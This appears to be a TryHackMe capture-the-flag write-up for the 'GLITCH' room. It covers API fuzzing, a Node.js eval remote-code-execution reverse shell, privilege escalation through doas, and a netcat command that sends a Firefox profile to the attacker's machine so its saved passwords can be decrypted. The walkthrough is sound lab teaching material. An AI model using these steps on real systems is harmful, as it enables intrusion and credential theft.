Prior to completing this room, I recommend you get familiar with:-

• How APIs work, HTTP requests and methods
• Burpsuite or OWASP ZAP
• Privilege escalation

‍

Enumeration & setup

To start off, we’ll add the machine’s IP address to the “/etc/hosts” file.

‍

‍

Next, let’s do some enumeration with Nmap to see what we’re working with.

‍

‍

Nothing interesting shows up, only port 80 is open for the web server, so let’s check it out.

‍

Getting an access token

‍

‍

Again, nothing interesting here, but notice that the page title says “not allowed”, hinting that we need an access token before doing anything else, as mentioned on the TryHackMe page.

Before looking at how to get the token, I was curious and wanted to check the local storage and cookies for the page.

And sure enough, there was a token cookie with no value. So once we get our access token, we’ll paste it in the cookie’s value field.

‍

‍

Taking a look at the page’s source, we find an interesting function called “getAcess”.

‍

‍

So let’s head to the console and call it to get our access token.

‍

‍

Now if you haven’t noticed, the token is base64 encoded so we have to decode it to get the actual access token.

There are many ways to do this, but the easiest one is to do it through your terminal.

‍

echo "encoded token" | base64 -d

‍

Don’t forget to update your token cookie with the decoded string.

‍

Finding the first flag

‍

‍

Now we see a different web page after updating the cookie.

There’s nothing interesting on the page itself, but looking at the source code I found a JavaScript file containing a link to an API endpoint.

‍

‍

Now since we don’t know what parameters we can call the API with, we can fuzz it to see what parameters it expects.

There are multiple ways to do this, but I’ll do it using gobuster.

‍

gobuster fuzz -m POST -u http://glitch.thm/api/items?FUZZ=test -w Seclists/Discovery/Web-Content/api/objects.txt

‍

One of the responses stands out, which is when we call the API using the “cmd” parameter.

‍

‍

So we’ll create a POST request to see the response.

‍

‍

It appears that this is running on nodejs, so a quick Google search for something along the lines of “nodejs eval remote code exec” will give you multiple exploits you can use.

To deliver this, I’ll use Burpsuite, and modify the exploit with my IP address and URL-encode it.

First of all, start a netcat listener.

‍

nc -lvnp 4444

‍

Then start Burpsuite and intercept a request to the API. To modify it and resend it, we’ll send the captured request to Repeater.

‍

‍

So all we need to do now is modify the data passed in the “cmd” parameter to our exploit, and change the method to POST.

After pasting your exploit in and modifying it, make sure to URL-encode it by selecting it and doing “right click -> Convert selection -> URL -> URL-encode key characters”.

‍

‍

Send the request and you should get a reverse shell.

The first flag is easy to find, it’s in the home directory.

‍

‍

Finding the last flag

I upgraded the shell first before moving on.

This is not necessary.

‍

python -c "import pty;pty.spawn('/bin/bash')"

‍

After some digging around, the only interesting thing I found was a hidden Firefox directory.

‍

‍

Let’s transfer this to our machine. There are multiple ways to do this, but this is the simplest.

On your machine, start a new listener:

‍

nc -l 8888 | tar xf -

‍

On the GLITCH box:

‍

cd .firefoxtar cf - . | nc <IP>  8888

‍

Again, there are also multiple ways to view the passwords from the Firefox files, but I used firefox_decrypt.

After switching users to v0id, we check what privs we have with “sudo -l”, but as the room suggests in the hint, sudo can’t be used.

‍

‍

So I did some digging using find.

‍

‍

And sure enough, we see “doas”, and we can use it for a very easy privsec to root and get the final flag.

‍